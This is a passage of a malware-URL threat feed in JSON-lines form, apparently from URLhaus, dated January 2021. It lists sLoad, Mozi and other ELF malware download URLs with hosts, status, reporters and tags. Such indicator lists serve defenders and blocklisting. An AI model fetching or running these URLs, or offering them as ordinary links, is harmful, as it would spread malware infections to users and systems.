UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961416","urlhaus_reference":"https://urlhaus.abuse.ch/url/961416/","url":"https://belfetproduction.com/bella/RTTCRL58M29A794D/logo.css","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:47:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961417","urlhaus_reference":"https://urlhaus.abuse.ch/url/961417/","url":"https://letonguesc.com/leto/04138120169/en.jpg","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:47:35 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961408","urlhaus_reference":"https://urlhaus.abuse.ch/url/961408/","url":"https://letonguesc.com/leto/SPGMRC73H13A475I/it.jpg","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961409","urlhaus_reference":"https://urlhaus.abuse.ch/url/961409/","url":"https://letonguesc.com/leto/80007070552/it.png","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961410","urlhaus_reference":"https://urlhaus.abuse.ch/url/961410/","url":"https://letonguesc.com/leto/02482130271/logo.png","url_status":"offline","host":"letonguesc.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961411","urlhaus_reference":"https://urlhaus.abuse.ch/url/961411/","url":"https://univirtek.com/viro/15730201009/uk.gif","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961412","urlhaus_reference":"https://urlhaus.abuse.ch/url/961412/","url":"https://univirtek.com/viro/01074480250/maps.css","url_status":"offline","host":"univirtek.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961413","urlhaus_reference":"https://urlhaus.abuse.ch/url/961413/","url":"https://cxminute.com/minu/SCHRKE77C47G224W/1x1.jpg","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961414","urlhaus_reference":"https://urlhaus.abuse.ch/url/961414/","url":"https://cxminute.com/minu/04281560377/en.css","url_status":"offline","host":"cxminute.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961415","urlhaus_reference":"https://urlhaus.abuse.ch/url/961415/","url":"https://ladiesincode.com/ladi/02613440060/maps.png","url_status":"offline","host":"ladiesincode.com","date_added":"2021-01-14 20:47:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961406","urlhaus_reference":"https://urlhaus.abuse.ch/url/961406/","url":"https://nowyouknowent.com/werdona/PLLRRT83A05H501O/it.gif","url_status":"offline","host":"nowyouknowent.com","date_added":"2021-01-14 20:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961407","urlhaus_reference":"https://urlhaus.abuse.ch/url/961407/","url":"https://hoagtechhydroponics.com/teco/LGTCDC74T45F205G/logo.png","url_status":"offline","host":"hoagtechhydroponics.com","date_added":"2021-01-14 20:47:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961404","urlhaus_reference":"https://urlhaus.abuse.ch/url/961404/","url":"https://belfetproduction.com/bella/00160060349/uk.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:42:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961405","urlhaus_reference":"https://urlhaus.abuse.ch/url/961405/","url":"https://belfetproduction.com/bella/01288650243/1x1.jpg","url_status":"offline","host":"belfetproduction.com","date_added":"2021-01-14 20:42:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Cryptolaemus1","larted":"false","tags":["sLoad"]} +{"id":"961403","urlhaus_reference":"https://urlhaus.abuse.ch/url/961403/","url":"http://117.251.59.53:50611/bin.sh","url_status":"online","host":"117.251.59.53","date_added":"2021-01-14 20:39:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961402","urlhaus_reference":"https://urlhaus.abuse.ch/url/961402/","url":"http://60.243.120.169:45371/Mozi.a","url_status":"online","host":"60.243.120.169","date_added":"2021-01-14 20:36:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961400","urlhaus_reference":"https://urlhaus.abuse.ch/url/961400/","url":"http://61.54.50.155:50093/Mozi.m","url_status":"online","host":"61.54.50.155","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961401","urlhaus_reference":"https://urlhaus.abuse.ch/url/961401/","url":"http://59.95.175.109:36652/Mozi.m","url_status":"online","host":"59.95.175.109","date_added":"2021-01-14 20:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961397","urlhaus_reference":"https://urlhaus.abuse.ch/url/961397/","url":"http://42.235.65.235:54182/Mozi.m","url_status":"online","host":"42.235.65.235","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961398","urlhaus_reference":"https://urlhaus.abuse.ch/url/961398/","url":"http://222.137.177.178:46048/Mozi.m","url_status":"online","host":"222.137.177.178","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961399","urlhaus_reference":"https://urlhaus.abuse.ch/url/961399/","url":"http://222.137.232.114:33953/Mozi.m","url_status":"online","host":"222.137.232.114","date_added":"2021-01-14 20:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961393","urlhaus_reference":"https://urlhaus.abuse.ch/url/961393/","url":"http://182.117.10.46:36447/Mozi.a","url_status":"online","host":"182.117.10.46","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961394","urlhaus_reference":"https://urlhaus.abuse.ch/url/961394/","url":"http://171.38.193.49:36828/Mozi.m","url_status":"online","host":"171.38.193.49","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961395","urlhaus_reference":"https://urlhaus.abuse.ch/url/961395/","url":"http://202.111.130.185:55281/Mozi.m","url_status":"online","host":"202.111.130.185","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961396","urlhaus_reference":"https://urlhaus.abuse.ch/url/961396/","url":"http://119.102.83.85:49772/Mozi.m","url_status":"online","host":"119.102.83.85","date_added":"2021-01-14 20:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961391","urlhaus_reference":"https://urlhaus.abuse.ch/url/961391/","url":"http://117.222.165.246:50229/Mozi.m","url_status":"offline","host":"117.222.165.246","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961392","urlhaus_reference":"https://urlhaus.abuse.ch/url/961392/","url":"http://117.222.170.34:39996/Mozi.m","url_status":"online","host":"117.222.170.34","date_added":"2021-01-14 20:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961387","urlhaus_reference":"https://urlhaus.abuse.ch/url/961387/","url":"http://113.239.210.87:50195/Mozi.a","url_status":"online","host":"113.239.210.87","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961388","urlhaus_reference":"https://urlhaus.abuse.ch/url/961388/","url":"http://115.62.159.229:52447/Mozi.a","url_status":"online","host":"115.62.159.229","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961389","urlhaus_reference":"https://urlhaus.abuse.ch/url/961389/","url":"http://113.90.237.126:56321/Mozi.m","url_status":"online","host":"113.90.237.126","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961390","urlhaus_reference":"https://urlhaus.abuse.ch/url/961390/","url":"http://115.219.146.151:54620/Mozi.m","url_status":"online","host":"115.219.146.151","date_added":"2021-01-14 20:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961386","urlhaus_reference":"https://urlhaus.abuse.ch/url/961386/","url":"http://60.7.65.79:52064/Mozi.a","url_status":"online","host":"60.7.65.79","date_added":"2021-01-14 20:23:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961385","urlhaus_reference":"https://urlhaus.abuse.ch/url/961385/","url":"http://59.93.16.88:47401/Mozi.m","url_status":"offline","host":"59.93.16.88","date_added":"2021-01-14 20:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961382","urlhaus_reference":"https://urlhaus.abuse.ch/url/961382/","url":"http://59.95.174.61:46527/Mozi.m","url_status":"online","host":"59.95.174.61","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961383","urlhaus_reference":"https://urlhaus.abuse.ch/url/961383/","url":"http://59.93.21.239:38132/Mozi.m","url_status":"offline","host":"59.93.21.239","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961384","urlhaus_reference":"https://urlhaus.abuse.ch/url/961384/","url":"http://45.176.111.252:59015/Mozi.m","url_status":"online","host":"45.176.111.252","date_added":"2021-01-14 20:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961379","urlhaus_reference":"https://urlhaus.abuse.ch/url/961379/","url":"http://222.137.176.198:59454/Mozi.m","url_status":"online","host":"222.137.176.198","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961380","urlhaus_reference":"https://urlhaus.abuse.ch/url/961380/","url":"http://42.232.233.146:37883/Mozi.m","url_status":"online","host":"42.232.233.146","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961381","urlhaus_reference":"https://urlhaus.abuse.ch/url/961381/","url":"http://42.234.255.164:55209/Mozi.m","url_status":"online","host":"42.234.255.164","date_added":"2021-01-14 20:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961378","urlhaus_reference":"https://urlhaus.abuse.ch/url/961378/","url":"http://182.59.96.114:41062/Mozi.m","url_status":"online","host":"182.59.96.114","date_added":"2021-01-14 20:21:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961377","urlhaus_reference":"https://urlhaus.abuse.ch/url/961377/","url":"http://211.226.185.30:60380/i","url_status":"online","host":"211.226.185.30","date_added":"2021-01-14 20:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961375","urlhaus_reference":"https://urlhaus.abuse.ch/url/961375/","url":"http://195.87.190.106:54796/Mozi.m","url_status":"online","host":"195.87.190.106","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961376","urlhaus_reference":"https://urlhaus.abuse.ch/url/961376/","url":"http://183.188.139.70:35251/Mozi.m","url_status":"online","host":"183.188.139.70","date_added":"2021-01-14 20:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961373","urlhaus_reference":"https://urlhaus.abuse.ch/url/961373/","url":"http://117.222.173.201:50562/Mozi.m","url_status":"offline","host":"117.222.173.201","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961374","urlhaus_reference":"https://urlhaus.abuse.ch/url/961374/","url":"http://117.215.248.158:33445/Mozi.m","url_status":"online","host":"117.215.248.158","date_added":"2021-01-14 20:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961370","urlhaus_reference":"https://urlhaus.abuse.ch/url/961370/","url":"http://120.85.197.148:60280/Mozi.a","url_status":"online","host":"120.85.197.148","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961371","urlhaus_reference":"https://urlhaus.abuse.ch/url/961371/","url":"http://182.126.66.149:46386/Mozi.m","url_status":"online","host":"182.126.66.149","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961372","urlhaus_reference":"https://urlhaus.abuse.ch/url/961372/","url":"http://182.113.4.64:60288/Mozi.m","url_status":"online","host":"182.113.4.64","date_added":"2021-01-14 20:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961368","urlhaus_reference":"https://urlhaus.abuse.ch/url/961368/","url":"http://113.116.144.14:49731/Mozi.a","url_status":"online","host":"113.116.144.14","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961369","urlhaus_reference":"https://urlhaus.abuse.ch/url/961369/","url":"http://115.56.186.224:38837/Mozi.a","url_status":"online","host":"115.56.186.224","date_added":"2021-01-14 20:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961366","urlhaus_reference":"https://urlhaus.abuse.ch/url/961366/","url":"http://115.48.159.43:37814/Mozi.m","url_status":"online","host":"115.48.159.43","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961367","urlhaus_reference":"https://urlhaus.abuse.ch/url/961367/","url":"http://115.50.233.247:47507/Mozi.m","url_status":"online","host":"115.50.233.247","date_added":"2021-01-14 20:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961365","urlhaus_reference":"https://urlhaus.abuse.ch/url/961365/","url":"http://115.58.39.251:47140/i","url_status":"online","host":"115.58.39.251","date_added":"2021-01-14 20:18:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961363","urlhaus_reference":"https://urlhaus.abuse.ch/url/961363/","url":"http://42.224.170.54:41514/Mozi.a","url_status":"online","host":"42.224.170.54","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961364","urlhaus_reference":"https://urlhaus.abuse.ch/url/961364/","url":"http://42.235.100.87:58748/Mozi.m","url_status":"online","host":"42.235.100.87","date_added":"2021-01-14 20:10:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961362","urlhaus_reference":"https://urlhaus.abuse.ch/url/961362/","url":"http://175.168.229.209:51183/Mozi.m","url_status":"online","host":"175.168.229.209","date_added":"2021-01-14 20:10:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961361","urlhaus_reference":"https://urlhaus.abuse.ch/url/961361/","url":"http://182.119.164.30:42104/Mozi.m","url_status":"online","host":"182.119.164.30","date_added":"2021-01-14 20:10:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961354","urlhaus_reference":"https://urlhaus.abuse.ch/url/961354/","url":"http://42.224.52.56:53130/Mozi.m","url_status":"online","host":"42.224.52.56","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961355","urlhaus_reference":"https://urlhaus.abuse.ch/url/961355/","url":"http://58.255.134.250:57768/Mozi.m","url_status":"online","host":"58.255.134.250","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961356","urlhaus_reference":"https://urlhaus.abuse.ch/url/961356/","url":"http://42.230.54.138:34541/Mozi.m","url_status":"online","host":"42.230.54.138","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961357","urlhaus_reference":"https://urlhaus.abuse.ch/url/961357/","url":"http://219.156.51.117:51344/Mozi.a","url_status":"online","host":"219.156.51.117","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961358","urlhaus_reference":"https://urlhaus.abuse.ch/url/961358/","url":"http://42.234.186.111:40084/Mozi.m","url_status":"online","host":"42.234.186.111","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961359","urlhaus_reference":"https://urlhaus.abuse.ch/url/961359/","url":"http://58.249.73.109:60457/Mozi.m","url_status":"online","host":"58.249.73.109","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961360","urlhaus_reference":"https://urlhaus.abuse.ch/url/961360/","url":"http://27.41.5.197:34906/Mozi.a","url_status":"online","host":"27.41.5.197","date_added":"2021-01-14 20:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961353","urlhaus_reference":"https://urlhaus.abuse.ch/url/961353/","url":"http://176.113.161.71:59847/Mozi.m","url_status":"online","host":"176.113.161.71","date_added":"2021-01-14 20:10:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961352","urlhaus_reference":"https://urlhaus.abuse.ch/url/961352/","url":"http://122.165.112.82:47873/Mozi.m","url_status":"offline","host":"122.165.112.82","date_added":"2021-01-14 20:09:00 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961349","urlhaus_reference":"https://urlhaus.abuse.ch/url/961349/","url":"http://125.44.12.28:48645/Mozi.m","url_status":"online","host":"125.44.12.28","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961350","urlhaus_reference":"https://urlhaus.abuse.ch/url/961350/","url":"http://120.56.112.117:36524/Mozi.a","url_status":"online","host":"120.56.112.117","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961351","urlhaus_reference":"https://urlhaus.abuse.ch/url/961351/","url":"http://117.192.227.212:38726/Mozi.m","url_status":"online","host":"117.192.227.212","date_added":"2021-01-14 20:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961345","urlhaus_reference":"https://urlhaus.abuse.ch/url/961345/","url":"http://120.85.209.116:41149/Mozi.m","url_status":"online","host":"120.85.209.116","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961346","urlhaus_reference":"https://urlhaus.abuse.ch/url/961346/","url":"http://123.4.140.121:46993/Mozi.m","url_status":"online","host":"123.4.140.121","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961347","urlhaus_reference":"https://urlhaus.abuse.ch/url/961347/","url":"http://125.47.246.253:39190/Mozi.m","url_status":"online","host":"125.47.246.253","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961348","urlhaus_reference":"https://urlhaus.abuse.ch/url/961348/","url":"http://115.59.222.67:48344/Mozi.a","url_status":"online","host":"115.59.222.67","date_added":"2021-01-14 20:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961344","urlhaus_reference":"https://urlhaus.abuse.ch/url/961344/","url":"http://125.133.102.126:58427/bin.sh","url_status":"online","host":"125.133.102.126","date_added":"2021-01-14 20:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961343","urlhaus_reference":"https://urlhaus.abuse.ch/url/961343/","url":"http://115.55.179.98:41921/i","url_status":"online","host":"115.55.179.98","date_added":"2021-01-14 20:02:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961342","urlhaus_reference":"https://urlhaus.abuse.ch/url/961342/","url":"http://115.58.39.251:47140/bin.sh","url_status":"online","host":"115.58.39.251","date_added":"2021-01-14 19:55:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961341","urlhaus_reference":"https://urlhaus.abuse.ch/url/961341/","url":"http://61.3.126.151:34789/Mozi.m","url_status":"online","host":"61.3.126.151","date_added":"2021-01-14 19:52:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961340","urlhaus_reference":"https://urlhaus.abuse.ch/url/961340/","url":"http://59.94.182.91:37634/Mozi.m","url_status":"online","host":"59.94.182.91","date_added":"2021-01-14 19:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961339","urlhaus_reference":"https://urlhaus.abuse.ch/url/961339/","url":"http://58.249.22.65:41636/Mozi.m","url_status":"online","host":"58.249.22.65","date_added":"2021-01-14 19:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961338","urlhaus_reference":"https://urlhaus.abuse.ch/url/961338/","url":"http://222.141.10.143:32907/Mozi.m","url_status":"online","host":"222.141.10.143","date_added":"2021-01-14 19:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961336","urlhaus_reference":"https://urlhaus.abuse.ch/url/961336/","url":"http://27.198.22.182:57568/Mozi.a","url_status":"online","host":"27.198.22.182","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961337","urlhaus_reference":"https://urlhaus.abuse.ch/url/961337/","url":"http://42.224.136.106:40740/Mozi.m","url_status":"online","host":"42.224.136.106","date_added":"2021-01-14 19:51:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961331","urlhaus_reference":"https://urlhaus.abuse.ch/url/961331/","url":"http://42.224.41.9:35927/Mozi.m","url_status":"online","host":"42.224.41.9","date_added":"2021-01-14 19:51:04 